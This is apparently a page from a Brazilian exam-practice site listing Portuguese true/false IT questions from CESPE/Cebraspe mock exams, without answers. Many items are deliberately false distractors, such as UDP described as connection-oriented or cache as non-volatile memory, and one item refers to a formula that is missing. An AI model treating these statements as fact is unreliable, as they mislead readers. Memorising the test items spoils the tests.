Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 92 131. [Q1278484] Na arquitetura cliente-servidor, existem os fornecedores de recursos ou serviços a rede, que são chamados de clientes, e existem os requerentes dos recursos ou serviços, denominados servidores. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 61 132. [Q1278485] Um sistema distribuído pode ser conceituado como um sistema que possua múltiplas UCPs interconectadas trabalhando em conjunto. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistemas Distribuídos (Cluster, GRID etc.). Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 62 133. [Q1278486] A computação distribuída traz diversas vantagens, como a possibilidade de maior performance devido ao processamento paralelo e softwares menos complexos e mais simples de serem desenvolvidos quando se compara ao modelo centralizado. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistemas distribuídos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 63 134. [Q1278487] Em um modelo cliente-servidor, a comunicação de requisição/ resposta pode tanto seguir o modelo síncrono como o modelo assíncrono. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 64 135. [Q1278489] Um algoritmo é uma especificação da sequência ordenada de passos que deve ser seguida para a realização de uma tarefa, garantindo a sua repetibilidade. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceito de Algoritmo. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 66 136. [Q1278492] Algoritmos podem ser representados por uma descrição narrativa, fluxograma ou uma pseudolinguagem. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > A Representação de Algoritmos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 69 137. [Q1278474] A CPU é um componente presente nas placas de vídeo dos computadores e é responsável pelo processamento das imagens nos monitores. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos e Funcionamento dos Processadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 51 138. [Q1278475] O barramento de um computador é o componente responsável por executar praticamente todas as instruções necessárias para seu funcionamento. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos e Funcionamento dos Processadores. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 52 139. [Q1278476] São exemplos de memórias não-voláteis, o disco rígido, cartão SD e cache. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Memória. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 53 140. [Q1274793] Apriori é um dos algoritmos mais utilizados em tarefas de descoberta de regras associativas (Association Rules), em mineração de dados (Data Mining). c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 3º Simulado / Questão: 137 Sobre Análise de Informações, julgue os itens a seguir. 141. [Q1274494] Em modelos dimensionais, a granularidade pode ser definida como o nível de detalhamento dos dados armazenados. c) Certo e) ErradoDisciplinas/Assuntos vinculados: Tecnologia da Informação > Modelagem Conceitual de Dados. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 3º Simulado / Questão: 32 142. [Q1274495] Considere que um operador do Direito, por meio de uma ferramenta OLAP, está analisando os dados de quantitativo de processos concluídos por ano, e decide avaliar os dados por semestre e, em seguida, por mês. Neste caso podemos afirmar que o usuário realizou uma operação de Drill-Down. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > OLAP. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 3º Simulado / Questão: 33 143. [Q1268341] No Linux, podemos executar o agendamento de um desligamento ou reinicialização. Caso seja necessário que ocorra uma reinicialização nos próximos 10 minutos, podemos utilizar o comando shutdown -r -10. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 92 144. [Q1268364] UDP (User Datagram Protocol) é um protocolo orientado a conexões, confiável, que permite que um fluxo de dados entre duas máquinas conectadas em rede seja entregue sem erros. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 101 145. [Q1268370] O TCP (Transmission Control Protocol) oferece um meio para as aplicações enviarem datagramas IP encapsulados sem que seja necessário estabelecer uma conexão. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 107 146. [Q1268371] O modo de encapsulamento no IPSec no qual somente os dados do pacote (payload) são criptografados, não contemplando o cabeçalho IP, é o modo túnel. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 108 A respeito das licenças publicadas pela Free Software Foundation, analise as seguintes afirmações. 147. [Q1268326] A cobrança pelo uso de software protegido pela GPL (GNU General Public License) é ilegal. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Responsabilidades e Direitos de Propriedade de um Software. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 86 148. [Q1268318] Em um computador Windows, podemos habilitar a ferramenta de Shadow Copies, que permite criar cópias de segurança de arquivos na máquina do usuário, tornando possível manter um histórico de versões. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 82 149. [Q1268288] A memória principal tem como função oferecer armazenamento interno ao processador. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > HD (disco rígido), DVDs, CDs, etc.. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 60 150. [Q1268289] A arquitetura cliente-servidor é uma arquitetura de aplicativos centralizada, pois centraliza tarefas ou cargas de trabalho em único provedor de serviço, chamado de servidor, a partir de um único solicitante do serviço, chamado cliente. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente-Servidor. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 61 Acerca de Análise de Dados e Informações, julgue os itens seguintes, marcando C (Certo) ou E (Errado). 151. [Q1223794] Considerando a regra associativa {Fralda} -> {Cerveja}, obtida por meio da aplicação do algoritmo APriori numa base de dados de varejo, podemos afirmar que o fator de suporte (Sup) da regra é calculada da seguinte forma: c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área: Controle Externo - 1º Simulado / Questão: 136 152. [Q1223291] Dados armazenados em banco de dados relacionais são considerados dados não estruturados. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Relacionamentos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área Direito - 1º Simulado / Questão: 36 153. [Q1223292] Business Intelligence (BI) é um conjunto de métodos, de técnicas e de ferramentas que são utilizados para transformar dados em informação e em conhecimento com vistas a dar suporte ao processo de tomada de decisão. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Business Intelligence. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área Direito - 1º Simulado / Questão: 37 154. [Q1222006] As raias representam executores ou combinações de executores, uma área funcional, papel, ou em alguns casos uma organização externa, dividindo um diagrama de processos em partes fisicamente separadas. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > BPMN - Business Process Model and Notation. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita Estadual - 1º Simulado / Questão: 85 155. [Q1222007] A análise de processo TO BE é aquela em que um processo existente é melhorado e adaptado aos requisitos do cliente. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerenciamento de Processos de Negócio. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita Estadual - 1º Simulado / Questão: 86 156. [Q1222008] O termo de abertura é o documento que autoriza formalmente o início do projeto. Ele concede ao gerente de projetos a autoridade para aplicar os recursos organizacionais nas atividades do projeto. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gestão de Projetos. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita Estadual - 1º Simulado / Questão: 87 157. [Q1222012] Os princípios fundamentais da segurança da informação, também referidos como pilares da segurança da informação são a confidencialidade, a integridade, a disponibilidade, a autenticidade e o não repúdio. c) Certo e) Errado Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos Básicos de Segurança. Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor
Compartilhar